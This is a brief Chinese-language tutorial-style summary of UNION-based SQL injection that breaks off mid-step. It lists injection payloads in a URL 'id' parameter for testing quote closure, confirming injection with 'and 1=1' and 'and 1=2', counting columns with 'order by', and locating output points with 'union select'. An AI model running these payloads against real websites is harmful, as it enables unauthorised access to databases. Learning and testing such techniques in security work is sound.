Sql注入總結

Sql注入總結 聯合查詢: 一、利用閉合變量報錯測試注入點, ?id=1’ .這樣說明存在單引號閉合注入 二、是否存在注入點,用and語句測試 ?id=1’ and 1=2# ?id=1’ and 1=1# 三、猜想字段 ,?id=1’ order by 3%23 四、找到頁面中數據輸入點, ?id=-1’ union select 1,2,3%23 五、查數據庫,?id=1’ union sel
相關文章
相關標籤/搜索